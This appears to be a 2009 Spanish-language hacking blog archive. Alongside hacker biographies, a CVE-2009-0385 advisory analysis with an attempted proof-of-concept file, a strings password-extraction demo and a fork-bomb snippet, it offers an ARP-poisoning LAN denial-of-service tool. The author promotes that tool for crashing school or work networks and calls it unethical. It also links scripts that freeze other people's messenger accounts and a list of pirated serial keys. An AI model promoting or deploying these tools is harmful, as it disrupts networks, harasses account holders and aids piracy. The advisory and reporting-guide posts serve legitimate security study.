Robert "Pimpshiz" Lyttle de 18 años de edad, se encuentra bajo arresto domiciliario, por orden de una Corte Juvenil de ciudad Martinez, estado de California, acusado de ser uno de los miembros del grupo Deceptive Duo, que probadamente incursionaron ilegalmente y substrajeron información de los servidores del sistema de la Federal Aviation Administration de los Estados Unidos y descargaron información confidencial relacionada a las filmaciones de las actividades de los pasajeros de los aeropuertos. Al momento de su arresto Lyttle portaba una portátil IBM ThinkPad, un lector de huellas digitales del dedo pulgar y otros sofisticados dispositivos "The Deceptive Duo" (El dúo engañoso) ingresaron a un servidor de la FAA, empleado por la administración de Seguridad de la Aviación Civil de los Estados Unidos, encargada a partir de los fatídicos incidentes del pasado 11 de Septiembre del 2001, del monitoreo de las actividades de los pasajeros en todos los aeropuertos de ese país. Cada sitio web incursionado por estos hackers, mostraba una supuesta "patriótica misión" en la cual preconizaban ser ciudadanos de los Estados Unidos de América, determinados a salvar al país de una "amenaza extranjera" al exponer los huecos de inseguridad en Internet. Incluso incluyeron el logo del grupo, consistente en dos armas de fuego delante de una bandera norteamericana. Cabe mencionar que Robert Lyttle, siendo un joven adolescente, de apenas 14 años formó la corporación Sub-Seven Software, que desarrolló herramientas tales como el Troyano buscador de puertos Sub-Net, el desinstalador Uninstall it Pro y Define, entre otros y que muchos usuarios consideramos de gran utilidad. Posiblemente se convierta en un héroe del "underground" en el ciber-espacio. En Febrero del 2002 descubrió una vulnerabilidad en el AOL Instant Messenger, y mucho antes hizo lo propio con varios sistemas de Microsoft.

Adrian Lamo Este joven de 21 años manifiesta que está ayudando a las compañías y a los usuarios a entender los límites de la seguridad en Internet, aunque sus métodos alarmen a los gigantes del medio.Famoso por no tener hogar, duerme en obras de construción, cerca de Ben Franklin en Philadelphia. Lleva siempre consigo una laptop Toshiba y un celular, pero case siempre navega en computadoras públicas con conexión del Internet, trabaja temporalmente como consultor (freelance) de seguridad, a pedido de corporaciones. Hace unos años, Lamo se hizo conocido en los círculos de hackers al haber ingresado en las redes de America on Line, Yahoo y Worldcom, informando a sus administradores la forma cómo lo hizo. Los propios administradores lo han llamado brillante y "provechoso" por descubrir estos huecos en sus redes.

El Gran Oscarín hacker español de 27 años, autor del troyano Cabronator, las iniciales son O.L.H y que en los primeros días de Abril del 2003 fue detenido por la Guardia Civil de Española, en un operativo denominado CLON que se inició en Agosto del 2002. Su impresionante ego está casi a la par con sus prolíficas creaciones de todas sus herramientas de hacking y cracking, virus, juegos obscenos, etc. Lycos Mail Anegator "...Bombardea cuentas de lycos a base de e-mails. MSN-Phuk "...Carga cuentas de Hotmail ajenas"Psecreta "Lo que hace es averiguar la pregunta secreta que ponen los capullos de los usuarios de HOTMAIL "O-MaiL 1.00: ..."Programa para enviar e-mails anónimos a la basca"Chivator Con este programa puedes ver qué se esconde bajo esos misteriosos ******* que ponen los programas l3ims en sus contraseñasBOMBITA: ..."es un programa de envío masivo de e-mails"ANONIMIZAME: ..."Un programa que configura tu Internet Explorer para que navegues por internet de forma ANÓNIMA bajo un proxy"

Tsutomu Shimomura Shimomura buscó lo encontró y desenmascaro a Kevin Mitnick, el cracker/phreaker más famoso de USA, a principios de 1994. Después de que sus colegas del "San Diego Supercomputing Center" le informaron a Shimomura que alguien había robado centenares de programas y los ficheros de su estación de trabajo, el experto en seguridad computacional Tsutomu trabajó en extremo para seguir al ladrón a través del "WELL". Un rastro del "telco labyrinthine" lo condujo eventualmente a un complejo en Raleigh, N.C donde más tarde los agentes de FBI arrestarían a Mitnick en su departamento. Pero eso no fue todo, Shimomura fue el consultor del FBI, la fuerza aérea y de la agencia de la seguridad nacional (NSA). se rumorea que Shimomura era parte del lado oscuro del hacking. ya que si no ¿por que hizo un programa para escuchar las llamadas de teléfonos celulares? ¿No les suena de alguna manera como una treta de la NSA?

Justin Frankel comenzó cuando en 1.999, con apenas 19 años de edad vendió su empresa NullSoft, propietaria de WinAmp, a AOL por 100 millones de dólares.Durante ese tiempo y ya trabajando bajo las órdenes de AOL, Frankel, con 25 años en la actualidad, ha sido el artífice de la red descentralizada Gnutella, del sistema de streaming Shoutcast y del programa de pares Waste, lo cual y según la revista Rolling Stone le ha hecho merecedor del título del "Geek más peligroso del mundo". Mientras trabajaba bajo las órdenes de AOL, Frankel creó Gnutella, la primera red de pares descentralizada del mundo, que colgó en uno de los servidores de la compañía cogiendo a todo el mundo por sorpresa.A las pocas horas el programa fue retirado, pero había dado tiempo suficiente de que miles de personas lo descargaran y aprendiesen de su código fuente.Sin ningún género de dudas, Frankel es un programador prodigioso, pero demasiado incómodo para trabajar a las órdenes de una compañía como AOL. Ahora, libre y con dinero suficiente como para tan no tener que preocuparse en ganarlo, puede ser una auténtica bomba de relojería.

Ray Tomilson Hace treinta y dos años en 1971, Ray Tomlinson, un joven ingeniero de la firma Bolt Beranek and Newman (encargada de construir la Arpanet, la red de computadoras precursora de la Internet),se puso a trabajar en el desarrollo del SNDMSG, un programa para enviar mensajes a usuarios de una misma computadora. Tomlinson estaba experimentando con un programa que había escrito, el CPYNET, que permitía transferir archivos entre computadoras (en ese entonces, la Arpanet consistía de 23 computadoras en 15 sitios de los Estados Unidos). Se le ocurrió que así como alguien podía enviar un mensaje a un usuario de la misma computadora, también debería poder hacerlo con los científicos que usaban equipos en todo el país. Ese día fue cuando decidió incorporar al CPYNET en el SNDMSG (en total, unas 200 líneas de código) para que todos pudieran agregar texto al archivo-casilla de cualquier usuario de la Arpanet. Tomlinson quería diferenciar el nombre del usuario de la computadora en la que trabajaba, y eligió la arroba @, que en inglés significa at (en tal lugar). El signo tenía poco uso en ese entonces, y no se confundía con otras instrucciones. Una vez que ajustó el funcionamiento del software, Tomlinson le envió un mensaje a sus colegas, promocionando el sistema. Fue un pequeño éxito. Todos los que tenían acceso a la red comenzaron a usarlo. Dos años después, el 75% del tráfico de la Arpanet correspondía al e-mail. Hoy se envían 2100 millones de mensajes por día.

Fuente http://new.taringa.net/posts/1606796

--
- Anon

[C] digit "Determinacion si un caracter es Digito o no"

2009-03-31T11:07:00.001-06:00

6.1 Escriba una función dígito que determine si un carácter es uno de los dígitos 0,1,2,...9.

El problema anterior se me hace una perdida de tiempo estaremos reinventando la rueda toda la vida con este tipo de ejercicios tan estúpidos o que onda.

En la librería ctype.h se encuentra ya esa función pre programada como isdigit()

Descargar digit.c


#include<stdio.h>
#include<ctype.h>
 
int main()	{
 	char c;
	printf("Ingrese un digito: ");
 	if(isdigit(getchar()))	{
 		printf("\nSi es digito!\n");
 	}
	else	{
		printf("\nNo es digito!\n");
 	}
	return 0;
}

Ahora aqui la muestra con una función tal y como dice el ejercicio en este ejemplo con if

Descargar digit_funtion01.c

#include<stdio.h>
  
int esdigito(int);
 
int main()	{
 	char c;
	printf("Ingrese un digito: ");
 	if(esdigito(getchar()))	{
 		printf("\nSi es digito!\n");
 	}
	else	{
		printf("\nNo es digito!\n");
 	}
	return 0;
}
 
int esdigito(int c)	{
 	if(c>= '0' && c<= '9')
 		return 1;
	else
		return 0;
 }

Y Ahora lo mismo pero en lugar de if seria Operador Ternario

Descargar digit_funtion02.c

#include<stdio.h>
 
int esdigito(int);
  
int main()	{
	char c;
 	printf("Ingrese un digito: ");
 	if(esdigito(getchar()))	{
 		printf("\nSi es digito!\n");
 	}
	else	{
		printf("\nNo es digito!\n");
 	}
	return 0;
}
 
int esdigito(int c)	{
 	return (c>= '0' && c<= '9') ? 1 : 0;
 }

Creo que es posible hacerlo con Expresiones regulares, sin embargo en mi opinión y para este caso seria lo mas optimo que se puede escribir la función.

Saludos

--
- Anon

Revistas HackxCrack

2009-03-21T23:03:00.001-06:00

Hola que tal he agregado un mirror a estas revistas, espero y les sirvan.

HrackxCrack

Saludos

--
- Anon

[ES] CVE-2009-0385 mas detalles

2009-03-21T12:29:00.001-06:00

Me he comunicado con Tobias Klein para pedir un mas detalles sobre la prueba de concepto para el bug descrito en el CVE-2009-0385, su comentario fue el siguiente

The vulnerability is 100% exploitable to execute arbitrary code. See http://tk-blog.blogspot.com/2009/01/exploitable-userland-null-pointer.html.

Tobi

Segun describe en su blog, logro confirmar la vulnerabilidad y controlar el EIP tanto en windows y opensuse.

El tiene un PoC, no le comente nada sobre el, mas que nada le pregunte sobre la estructura 4xm.

Tambien me he comunicado con Mike Melanson que al parecer hace tiempo que no hablar el tema del formato de los archivos 4xm su cometario fue el siguiente

What exactly are you trying to accomplish? I don't have all the details of the 4xm format fresh in my mind. All of my knowledge is written down in either that document, or the FFmpeg demuxer (I also wrote the xine 4xm demuxer).

Buscando sobre ello encontré con la pagina de la discusión de la vulnerabilidad

http://bugs.xine-project.org/show_bug.cgi?id=205

Ahi comenta que xine-lib tiene un problema similar al descrito por Tobias que lo discute en su blog

http://tk-blog.blogspot.com/2009/02/tkadv2009-004-vs-xine-lib.html

Bueno con esto ya tengo en mente que la vulnerabilidad del CVE-2009-0385 es explotable, espero terminar de entender el formato 4xm para poder terminar el PoC que la verdad es muy simple

Saludos
--
- Anon

[EN] CVE-2009-0385 more details

2009-03-21T12:27:00.001-06:00

I contacted Tobias Klein asked for a more details on the proof of concept for the bug described in CVE-2009-0385, his comment was as follows

The vulnerability is 100% exploitable to execute arbitrary code. See http://tk-blog.blogspot.com/2009/01/exploitable-userland-null-pointer.html.

Tobi

As described in his blog, an achievement confirmed the vulnerability and control the EIP in windows and opensuse.

The PoC has not told her anything about him, more than anything you ask about the structure 4xm.

I have also communicated with Mike Melanson who apparently does not speak while the issue of the format of your files cometary 4xm was as follows

What exactly are you trying to accomplish? I do not have all the details of the format 4xm fresh in my mind. All of my knowledge is written down either in that document, or the FFmpeg demuxer (I also wrote the xine demuxer 4xm).

Searching on this page to find the discussion of vulnerability

http://bugs.xine-project.org/show_bug.cgi?id=205

There he says that xine-lib has a problem similar to that described by Tobias discusses in his blog

http://tk-blog.blogspot.com/2009/02/tkadv2009-004-vs-xine-lib.html

Well I already have in mind the vulnerability CVE-2009-0385 is usable, I hope to understand format complete 4xm order to complete the PoC that truth is very simple

Regards

--
- Anon

[Python] ItMsnProtocol (Project)

2009-03-20T10:16:00.006-06:00

Creado por Erik#
El script para desbloquearse esta genial.

Saludos

ItMsnProtocol Project

¿Que es?
Son unos scripts python de código abierto que usando la libreria msnp pueden crear diferentes sistemas de utilización.

Actuales scripts:
Actualmente, estamos creando FreezItMsn y ByPassItMsn.

FreezItMsn:
Es un script que mediante un cierto tiempo, cuestion de segundos, congela la cuenta de messenger, no permite abrir al usuario su cuenta, le da error.

ByPassItMsn:
Es un script que mediante un cierto tiempo, cuestion de segundos, inhabilita las congelaciones a tu cuenta.

Descargas:
Pack completo: http://krews.es/ItMsnProtocol.zip

A qui pongo un mirror parece que el sitio original esta ya caido:

http://cid-4d0c9dba4e99e162.skydrive.live.com/self.aspx/.Public/src/ItMsnProtocol.zip

--
- Anon

Cafeshito: Futura aplicación para Cybers.

2009-03-19T18:38:00.001-06:00

CAFESHITO es una aplicacion para administrar, controlar, mediar el tiempo de consumo de los equipos de
computo conectados a la red del cybercafe, ya sean equipos conectado a la red local o equipos conectados
a la red inalambrica. CAFESHITO es una aplicacion de software libre desarrollada principalmente para los cybercafes que desean
aventurarse en la implementacion de redes monitoreadas de cybercafe sbre GNU/Linux.

CAFESHITO es un proyecto de software desarrollado por el grupo de programadores perteneciendes a la empresa
de seguridad informatica y desarrollo de software SIE-Group. SIE-Group es una empresa que patrocina y
desarrolla proyectos innovadores utiles para los usuarios.

CAFESHITO es un proyecto emprendido el 10 de Marzo del 2009 por el M.S.I Angel Cantu (Diabliyo) y como aun
es una version 'inestable' y en desarrollo, la pagina del proyeto esta abierta a propuestas, colaboraciones
o incorporacion de gente programadora interesada, para mayor informacion visitar el sitio.

Web del Proyecto:
---> http://cafeshito.sie-group.net/ <---

--
- Anon

More than 1 million and Serial Key and Freeware Software

2009-03-18T20:11:00.001-06:00

More than 1 million and Serial Key of Freeware and Software 2007-2008

Millon_Keys.txt.bz2

Regards

Mas de 1 millon de Serial Key y Claves de Freeware y Software 2007-2008

Millon_Keys.txt.bz2

Saludos

--
- Anon

CVE-2009-0385: FFmpeg Type Conversion Vulnerability

2009-03-18T17:47:00.001-06:00

Original Advisory

http://www.trapkit.de/advisories/TKADV2009-004.txt

Citar

==================
Technical Details:
==================

Source code file: libavformat/4xm.c

[..]
93 static int fourxm_read_header(AVFormatContext *s,
94 AVFormatParameters *ap)
95 {
..
103 [8] int current_track = -1;
..
106 [9] fourxm->track_count = 0;
107 [10] fourxm->tracks = NULL;
..
160 } else if (fourcc_tag == strk_TAG) {
161 /* check that there is enough data */
162 if (size != strk_SIZE) {
163 av_free(header);
164 return AVERROR_INVALIDDATA;
165 }
166 [1] current_track = AV_RL32(&header[i + 8]);
167 [2] if (current_track + 1 > fourxm->track_count) {
168 fourxm->track_count = current_track + 1;
169 if((unsigned)fourxm->track_count >= UINT_MAX /
sizeof(AudioTrack))
170 return -1;
171 [3] fourxm->tracks = av_realloc(fourxm->tracks,
172 fourxm->track_count * sizeof(AudioTrack));
173 if (!fourxm->tracks) {
174 av_free(header);
175 return AVERROR(ENOMEM);
176 }
177 }
178 [4] fourxm->tracks[current_track].adpcm = AV_RL32(&header[i + 12]);
179 [5] fourxm->tracks[current_track].channels = AV_RL32(&header[i + 36]);
180 [6] fourxm->tracks[current_track].sample_rate = AV_RL32(&header[i+40]);
181 [7] fourxm->tracks[current_track].bits = AV_RL32(&header[i + 44]);
[..]

[1] The signed int variable "current_track" (see [8]) is filled with user
supplied data from the media file
[2] This statement checks if the user controlled value of "current_track"
is greater than "fourxm->track_count". The variable "fourxm-
>track_count" is initialized with 0 (see [9]). By supplying a value >=
0x80000000 for "current_track" it is possible to cause a change in sign
that results in "current_track" being negative. If "current_track" is
negative, the if statement will always return false and the buffer
allocation in [3] will never be reached.
[4] As "fourxm->tracks" is initialized with NULL (see [10]) and line 171 is
never reached this leads to an exploitable NULL pointer dereference. It
is possible to write 4 bytes of user controlled data to the memory
location "NULL + current_track". As the value of "current_track" is
also controlled by the user it is possible to write 4 bytes of
arbitrary data at a wide range of memory addresses.
[5] See [4]
[6] See [4]
[7] See [4]

A malicious party may exploit this issue to execute arbitrary code by
overwriting a sensitive memory location (such as a GOT/IAT entry, a return
address, buffer length or boolean variable).

Afecta a algunos reproductores como xine Mplayer entre otros, Según yo solo podremos crear un DoS pero seria de ver.

Ya hay parche pero dudo que los linuxeros (Comunes) estén parcheando cada una de las vulnerabilidades que salen...

Bueno, he tratado de crear un PoC para la vulnerabilidad sin embargo no lo he logrado, tengo un archivo 4xm que según yo debería de funcionar o por lo menos eso creo.

Al parecer no he comprendido muy bien el formato de los los archivos 4xm.

El formato 4x Movie esta descrito aqui:
http://multimedia.cx/4xm-format.txt

Citar

4xm files appear to have the following general structure:

RIFF header
LIST-HEAD chunk
LIST-HNFO chunk
LIST-TRK_ chunk
LIST-VTRK chunk
LIST-STRK chunk
[..more tracks..]
LIST-MOVI chunk
LIST-FRAM chunk
LIST-FRAM chunk
LIST-FRAM chunk
[..more frame tracks..]

tengo duda de LIST-HNFO ya que de este no esta entre las decalaraciones de los Tag de la libreria:

libavformat/4xm.c

Código

#define  RIFF_TAG MKTAG('R', 'I', 'F', 'F')
#define _4XMV_TAG MKTAG('4', 'X', 'M', 'V')
 #define  LIST_TAG MKTAG('L', 'I', 'S', 'T')
#define  HEAD_TAG MKTAG('H', 'E', 'A', 'D')
 #define  TRK__TAG MKTAG('T', 'R', 'K', '_')
#define  MOVI_TAG MKTAG('M', 'O', 'V', 'I')
 #define  VTRK_TAG MKTAG('V', 'T', 'R', 'K')
#define  STRK_TAG MKTAG('S', 'T', 'R', 'K')
 #define  std__TAG MKTAG('s', 't', 'd', '_')
#define  name_TAG MKTAG('n', 'a', 'm', 'e')
 #define  vtrk_TAG MKTAG('v', 't', 'r', 'k')
#define  strk_TAG MKTAG('s', 't', 'r', 'k')
 #define  ifrm_TAG MKTAG('i', 'f', 'r', 'm')
#define  pfrm_TAG MKTAG('p', 'f', 'r', 'm')
 #define  cfrm_TAG MKTAG('c', 'f', 'r', 'm')
#define  ifr2_TAG MKTAG('i', 'f', 'r', '2')
 #define  pfr2_TAG MKTAG('p', 'f', 'r', '2')
#define  cfr2_TAG MKTAG('c', 'f', 'r', '2')
 #define  snd__TAG MKTAG('s', 'n', 'd', '_')

Por lo cual dudo de su existencia, el PoC que hice esta usando dicha LIST pero al parecer el programa dentro del codigo no lo toma en cuenta, voy a seguir probando para generar un PoC que funcione:

Aqui esta el que cree 4xm_evil.4xm

El código en C con el cual lo cree esta bien raro, por lo cual mejor prefiero ordenarlo un poco mas y liberarlo.

Espero y les interese, Saludos.

--
- Anon

[Cadena] Credo del Programador

2009-03-17T20:58:00.001-06:00

Creo en un solo lenguaje de programación, "C" Todopoderoso
Creador de UNIX y de Windows
Creo en un solo "C++",
hijo único de "C" Nacido de "C" antes de "Visual C++"
"C" de "C", Compilador de Compilador,
"C"(c) copyrighted, Compilado, no interpretado,
de los mismos programadores que el Padre
por quien todo es programado,
que por nosotros los hombres y nuestros servidores
fue desarrollado
y por obra del Lenguaje Binario se encarnó en
ensamblador y se hizo Lenguaje
y por nuestra causa
es ampliamente aceptado en tiempos de Bill Gates.
Decayó y fue olvidado y se renovó al tercer día,
según los usuarios.
Y subieron las ventas, y esta ubicado dentro de todo UNIX
Por quien todo es programado
Y de nuevo vendrá mejorado para juzgar a virus y programas
Y su dominio no tendrá fin.
Creo en el lenguaje binario, código y base del sistema
Que precede al padre y al hijo. Que con el padre y el hijo
recibe una misma aplicación y memoria
y que habló por los procesadores...
Creo en la arquitectura IBM, que es una, sólida, compacta y compatible.
Confieso que no hay ni un solo "undo" para la corrección de los errores
Espero la resurrección de las Macs y la vida en un mundo con Internet...

Enter

--
- Anon

I need beta-testers 4 tequiLAN: simple tool a DoS on LAN

2009-03-15T13:41:00.003-06:00

Bueno, escribo esto para solicitar su ayuda testear la herramienta que he creado "tequiLAN".

¿Que es tequiLAN?
Es una herramienta creada mediante libnet y libpcap, genera un DoS en la LAN utilizando ARP Poison.

¿Como lo hace?
A cada petición ARP-REQUEST que llege al NIC y que no tenga nuestra dirección IP Responde con un ARP-REPLY con la IP Pedida y una MAC Aleatoria.

Esto como la mayoría ya sabrá y ha experimentado con herramientas como nemesis, arpspoof entre otras, nos puede generar un DoS o si lo aprovechamos podremos crear un redirector de trafico hacia nuestra NIC sin embargo esos ya existen y pues no quiero reinventar la rueda.

¿Usos principales?
Pues si estamos en la escuela y no queremos hacer un examen Online o parecido pues simplemente podremos tumbar la red.
O igual si nos queremos dar un tiempo en el trabajo pues también lo usamos.

¿Ética?
Ninguna es una herramienta totalmente fuera de ética, solo lo programe por programarlo. Así que si alguien quiere comentar sobre mis intenciones o las implicaciones que pueda tener pues que me lo mande por PM y no aquí.

Archivo: tequiLAN_0.1.tar.bz2.gpg

Efecto sobre el router:

Consumo de Recursos al Reservar memoria para Equipos inexistentes

Efecto sobre las victimas:

DoS

Apariencia de la salida

Cosas que hay que testear

Utilidad del Makefile
¿Se necesitan cambios?
¿Otra organización?

Sugerencias para mejorar funciones, estructuras, compatibilidad, rendimiento, Licencia etc.

Bueno si alguien quiere ayudar a testear la librería, que me mande un correo y le paso el password.

Saludos

--
- Anon

publicado flv2mpeg4

2009-03-12T12:19:00.001-06:00

Bueno, pues simple, ya fue publicado el mensaje de flv2mpeg4: Malformed parameters Denial of Service en securityfocus

http://www.securityfocus.com/archive/1/501704/30/0/threaded

haha no pensé que el error lo publicaran por el hecho de ser un error menor y además solo lo publique para ejemplificar como se podría dar el reporte de una vulnerabilidad, ya que anteriormente lo había mandado a milw0rm y me comentaron que no encajaba por el hecho de no poder escalar privilegios.

Saludos.

--
- Anon

Torneo de elevación de privilegios en WarZone (Torneo_Root)

2009-03-12T09:57:00.001-06:00

Se ha hecho un torneo nuevo de elevación de privilegios llamado Torneo_Root.

El objetivo, es obtener root en el servidor, por cualquier manera posible.

Va a estar online por 1 mes exactamente

El primero que lo logre tendra puntos extra y una cuenta @elhacker.net con acceso a todos sus servicios.

Se daran puntos extras por cualquier vulnerabilidad local en el sistema que afecte la integridad del torneo.

Los detalles estan en:
http://warzone.elhacker.net/pruebas.php?p=56

Obtienen su login en el servidor en:
http://warzone.elhacker.net/wzon.php

Se conectan por SSH al puerto 22 (para usuarios de windows pueden usar PuTTy).

Fue hecha con la colaboración de hackbsd.org

Diviertanse!!

Saludos!!

--
- Anon

Get codes and passwords unprotected program

2009-03-11T09:15:00.001-06:00

This is a simple example of how it could violate an application to request password or keys, and that is not protected.

The example of the application binary that would be the following code:

easyKey.c

Código

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
    
char *password = "A9D6B4C3E2F1";
    
int main(int argc, char **argv)	{
   	if(argc == 2)	{
   		if(strncmp(password,argv[1],strlen(password) ) == 0)
   			printf("ok\n");
   		else
			printf("no\n");
   	}
	else	{
		printf("Use:\n\t%s <key>\n",argv[0]);
   	}
	return 0;
}

After compile and run:

Código

Anon@localhost % gcc -o easyKey easyKey.c
   Anon@localhost % ./easyKey
Use:
       ./easyKey <key>
Anon@localhost % ./easyKey xD
   no
Anon@localhost % ./easyKey 1234
   no

Can see that the code "key" we can get using the strings that come in most Unix environments

Código:

Anon@localhost % strings easyKey
  /libexec/ld-elf.so.1
 FreeBSD
_Jv_RegisterClasses
libc.so.7
printf
puts
environ
__progname
strncmp
_init_tls
atexit
strlen
_end
FBSD_1.0
$FreeBSD: src/lib/csu/i386-elf/crti.S,v 1.7 2005/05/19 07:31:06 dfr Exp $
   A9D6B4C3E2F1
Use:
    %s <key>
$FreeBSD: src/lib/csu/i386-elf/crtn.S,v 1.6 2005/05/19 07:31:06 dfr Exp $
Anon@localhost % ./easyKey A9D6B4C3E2F1
ok

I hope and will help you someday.

Regards

--
- Anon

Conseguir Codigos y contraseñas de programas desprotegidos

2009-03-10T19:50:00.001-06:00

Este es un ejemplo sencillo de como se puede llegar a vulnerar una aplicación que pida serial o password y que no este protegida.

El ejemplo de la aplicación seria el binario que resulte del siguiente código:

easyKey.c

Código

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
  
char *password = "A9D6B4C3E2F1";
  
int main(int argc, char **argv)	{
 	if(argc == 2)	{
 		if(strncmp(password,argv[1],strlen(password) ) == 0)
 			printf("ok\n");
 		else
			printf("no\n");
 	}
	else	{
		printf("Use:\n\t%s <key>\n",argv[0]);
 	}
	return 0;
}

Despues de compilarlo y ejecutarlo:

Código

Anon@localhost % gcc -o easyKey easyKey.c
 Anon@localhost % ./easyKey
Use:
     ./easyKey <key>
Anon@localhost % ./easyKey xD
 no
Anon@localhost % ./easyKey 1234
 no

Podremos observar que dicho codigo "key" lo podemos obtener mediante la utilidad strings que viene en la mayoría de los Entornos Unix

Código:

Anon@localhost % strings easyKey
/libexec/ld-elf.so.1
 FreeBSD
_Jv_RegisterClasses
libc.so.7
printf
puts
environ
__progname
strncmp
_init_tls
atexit
strlen
_end
FBSD_1.0
$FreeBSD: src/lib/csu/i386-elf/crti.S,v 1.7 2005/05/19 07:31:06 dfr Exp $
 A9D6B4C3E2F1
Use:
    %s <key>
$FreeBSD: src/lib/csu/i386-elf/crtn.S,v 1.6 2005/05/19 07:31:06 dfr Exp $
Anon@localhost % ./easyKey A9D6B4C3E2F1
ok

Espero y les sirva algún día.

Saludos

--
- Anon

[FreeBSD] "Login Class" Limites y Clases para los Usuarios

2009-03-10T14:06:00.001-06:00

Bueno para que no se confundan desde ahorita, no me estoy refiriendo a los clásicos grupos del sistema UNIX, ya que generalmente estos solo nos dan restricciones sobre direcctorios y procesos que se nos permiten ejecutar, pero que hay de restringir el uso de la memoria o del CPU, Numero de Processos etc.

Dentro de FreeBSD el archivo /etc/login.conf nos permite gracer nuevas clases de usuarios para ajustar estos niveles de restricciones.

Por defecto el sistema nos coloca en default:

default:\
        :passwd_format=blf:\
        :copyright=/etc/COPYRIGHT:\
        :welcome=/etc/motd:\
        :setenv=MAIL=/var/mail/$,BLOCKSIZE=K,FTP_PASSIVE_MODE=YES:\
        :path=/sbin /bin /usr/sbin /usr/bin /usr/games /usr/local/sbin /usr/local/bin /usr/X11R6/bin ~/bin:\
        :nologin=/var/run/nologin:\
        :cputime=unlimited:\
        :datasize=unlimited:\
        :stacksize=unlimited:\
        :memorylocked=unlimited:\
        :memoryuse=unlimited:\
        :filesize=unlimited:\
        :coredumpsize=unlimited:\
        :openfiles=unlimited:\
        :maxproc=unlimited:\
        :sbsize=unlimited:\
        :vmemoryuse=unlimited:\
        :priority=0:\
        :ignoretime@:\
        :umask=022:

Como podremos ver esa clase de usuarios no tiene restriccion sobre los recursos.

Por describir un ejemplo real que he usado al momento de configurar el servidor para "Torneo Shell" en el warzone de elhacker.net.

Cree un clase de usuario llamada "Warusers" con lo cual limitaba los recursos del servidor el codigo es el siguiente:

warusers:\
       :copyright=/etc/COPYRIGHT:\
       :welcome=/etc/motd:\
       :setenv=MAIL=/var/mail/$,BLOCKSIZE=K:\
       :path=~/bin /bin /usr/bin /usr/local/bin:\
       :manpath=/usr/share/man /usr/local/man:\
       :nologin=/var/run/nologin:\
       :cputime=10m:\
       :datasize=8M:\
       :vmemoryuse=80M:\
       :stacksize=2M:\
       :memorylocked=4M:\
       :memoryuse=8M:\
       :filesize=8M:\
       :coredumpsize=1M:\
       :openfiles=48:\
       :maxproc=64:\
       :priority=0:\
       :umask=077:\
       :ignoretime@:

Con estas opciones podremos indicar hasta un archivo motd diferente para cada tipo de usuarios que tengamos en nuestro sistema. Limitamos cosas como el tiempo del CPU, la memoria, el Uso del Disco duro, Numero de procesos en ejecucion etc.

Anteriormente había colocado el tema de Fun D.o.S. local on a Unix system poorly managed con el cual generabamos una Denegacion de Serivicio al equipo por el hecho de consumir los procesos, esta es la solucion el campo maxproc especificamos el numero de procesos maximo lo cual nos daria cierta cantidad mas de control sobre el sistema otra muy recomendable es el opendiles la cual tambien es muy limitante sobre lo que pueden o no pueden hacer los usarios, el punto donde se especifica el login class a los usuarios es con el comando pw el cual podremos modificar la clase del usuario en cuestion y podre asi tener control sobre los recursos.

Espero y les sea de su ayuda.

Saludos
--
- Anon

[Tools] Microsoft Visual C++ Toolkit 2003

2009-03-10T11:56:00.000-06:00

Bueno programaba en C/C++ bajo windows una de las herramientas propias de microsoft era el Toolkit de Microsoft Visual C++ 2003 hera una herramienta a mi punto de vista buena, el compilador en linea cl tenia muchas opciones similares a las que tiene el gcc de unix, sin embargo esta herramienta fue sustituida por una mas pesada me refiero al Microsoft Visual Toolkit 2005 creo y la versión anterior dejo de estar disponible, es por ello que la he vuelto a subir para que la puedan descargar si es que la están buscando.

Descargar VCToolkitSetup.exe

MD5 (VCToolkitSetup.exe) = 90d8b963ca196aa9855b2ca6c3174c14
SHA1 (VCToolkitSetup.exe) = 50dc6cca1503f08a41d56816f3f1abcaf347b0bd

Pesa 31 Megabytes el instalador sin embargo una vez instalado pesa mucho mas, instala una versión vieja del Microsoft .NET Framework 1.1

Sirve muy buen para compilar pequeñas aplicaciones con un C estandar.

Espero y les sea de utilidad.

Saludos.
--
- Anon

[tools] nc11nt.zip Netcat 1.1 para Windows

2009-03-09T14:15:00.002-06:00

En repetidas ocasiones he visto que se seguido se pide dicha herramienta y muchas veces no es encontrada fácilmente.

Archivo: nc11nt.zip.gpg
Password: TevP6y9OSzSHQD
MD5 (nc11nt.zip.gpg) = 321886e9c17c0065b439490febceb224
SHA1 (nc11nt.zip) = c8812f5cb4e9d51280c25587ff0f58345c1b171f

Archivo: nc11nt.zip
MD5 (nc11nt.zip) = ec23eb106197f0616a7b2b5556ad72bd
SHA1 (nc11nt.zip) = c8812f5cb4e9d51280c25587ff0f58345c1b171f

Archivo: nc.exe
MD5 (nc.exe) = e0fb946c00b140693e3cf5de258c22a1
SHA1 (nc.exe) = 57f0839433234285cc9df96198a6ca58248a4707

Muchas veces es borrada por descuido ya que se teme que sea un virus o similar.

El uso de esta herramienta va de todos tipos desde administrativos, didacticos, es cliente multinacional, sirve en la mayoría de los protocolos de TCP/IP

Espero y les sirva.

Saludos

--
- Anon

Fun D.o.S. local on a Unix system poorly managed

2009-03-09T11:43:00.001-06:00

DoS_Local_fork.c

El siguiente código en C genera múltiples procesos, esto causa una Denegación de Servicio en un sistema mal administrado.

Código

int main()	{
 	while(1)
		fork();
 }

existen distintas maneras de protegerse de este código o "vulnerabilidad", todo depende del sistema que estés usando.

Agregare la de FreeBSD después.

Saludos.

--
- Anon

Como reportar vulnerabilidades

2009-03-08T22:43:00.001-06:00

Ya sea que encontremos un bug/error de pura casualidad o investigación y logremos detallar los pasos de como lo descubrimos y/o realizamos en ese momento podremos dar reporte a la falla.

El primer paso es delimitar el alcance de la falla.

Verificamos si es la ultima versión del software ya que si no es así o si existen actualizaciones que no tengamos puede que demos con una falla vieja, esta puede o no puede estar reportada.

Dependiendo de esto ultimo procederemos o no y trataremos de ver si versiones anteriores son vulnerables también.

Medir el impacto de la falla

Aqui determinamos el impacto de la falla sobre el sistema que la hospeda, entre los mas comunes tenemos:

Denegación de Servicio
Es el mas común, generalmente no pasaremos de hacer que la aplicación deje de funcionar

Consumo de recursos
Si no deja de funcionar, podremos causar algún consumo adicional de memoria y/o microprocesador

Ejecución de Código
Es lo que se busca en la mayoría de las veces, si logramos insertar código y ejecutarlo el sistema podría estar totalmente comprometido

Revelado de información
En dado caso podríamos revelar información que se supone que no deberíamos de poder ver.

Algun Error menor
Se podría dar la situación en la simplemente sobrescribamos alguna variable menor. Solo por mencionar algún ejemplo.

Encontrar el medio de comunicación con el creador del software (vendor)

